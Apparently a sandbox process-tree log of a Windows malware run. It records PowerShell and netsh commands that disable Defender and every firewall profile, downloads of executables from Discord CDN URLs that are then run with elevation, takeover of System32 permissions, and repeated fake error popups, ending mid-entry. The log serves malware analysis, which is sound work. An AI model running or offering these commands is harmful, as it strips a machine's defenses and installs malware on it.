- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
2⤵
- Modifies Windows Firewall
PID:3952

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
2⤵
- Modifies Windows Firewall
PID:2488

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
2⤵
- Modifies Windows Firewall
PID:3920

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
2⤵
- Modifies Windows Firewall
PID:4024

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
2⤵
- Modifies Windows Firewall
PID:1220

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
2⤵
- Modifies Windows Firewall
PID:3092

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'Exclusions' -Value 'C:\Windows\System32'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access' -Name 'DisableControlledFolderAccess' -Value 1"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection' -Name 'DisableNetworkProtection' -Value 1"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'AllowedApplications' -Value 'C:\Windows\System32'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'ExcludedPaths' -Value 'C:\Windows\System32'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'ProtectedFolders' -Value 'C:\Windows\System32'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'ProtectionEnabled' -Value 0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'PromptedProtectionEnabled' -Value 0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'PromptedProtectionEnabled' -Value 0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ControlledFolderAccess' -Name 'RansomwareProtectionEnabled' -Value 0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1237538022371754046/ByteVaultX.exe?ex=66473758&is=6645e5d8&hm=86bba81d6232969cb4ade81e882b8bcee5f5dacefa6cc2ac70ca40db4c969e4c&', 'C:\Users\Admin\Desktop\ByteVaultX.exe')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\Desktop\ByteVaultX.exe' -Verb RunAs"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1238213032279277699/D34TH_6.0.exe?ex=6647b1bf&is=6646603f&hm=a17f4d5fea737c6a13af1c4e897a50895221d179bd368787d2b09c5647e4daf7&', 'C:\Users\Admin\Desktop\D34TH_6.0.exe')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\Desktop\D34TH_6.0.exe' -Verb RunAs"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Users\Admin\Desktop\D34TH_6.0.exe
"C:\Users\Admin\Desktop\D34TH_6.0.exe"
3⤵
- Executes dropped EXE
PID:4756

C:\Users\Admin\Desktop\D34TH_6.0.exe
"C:\Users\Admin\Desktop\D34TH_6.0.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /F C:\Windows\System32 /R /D Y
5⤵
PID:5544

C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32 /R /D Y
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5652

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6064

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5992

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6084

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6320

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6608

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6884

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6628

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7292

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7640

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7984

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9132

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:9160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9404

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:9424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9724

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:9748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10020

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9324

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:9456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9328

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10444

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10952

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11224

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10460

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11012

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10852

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10952

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10988

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11332

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11492

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11592

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11752

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11924

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12112

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12212

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11956

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:3584

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16728

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:17028

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:16444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:17648

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:17992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:18344

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:20104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:20388

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:2148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14756

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:20704

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:20840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:20972

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21500

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:18632

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:20636

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:9252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9268

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7112

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21436

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14344

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32 /grant administrators:F /T
5⤵
PID:15404

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant administrators:F /T
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15492

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15876

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9304

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:20704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21988

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24520

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:22492

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:8304

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:23472

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:11360

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:11920

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
- Loads dropped DLL
PID:24600

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25084

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15356

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25468

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24920

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25288

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8596

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8132

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8164

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7820

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7832

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8768

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8980

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25508

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15692

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16816

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25300

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8608

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8188

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8176

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:17180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7832

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8764

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24708

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16736

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15716

C:\Windows\system32\cmd.exe
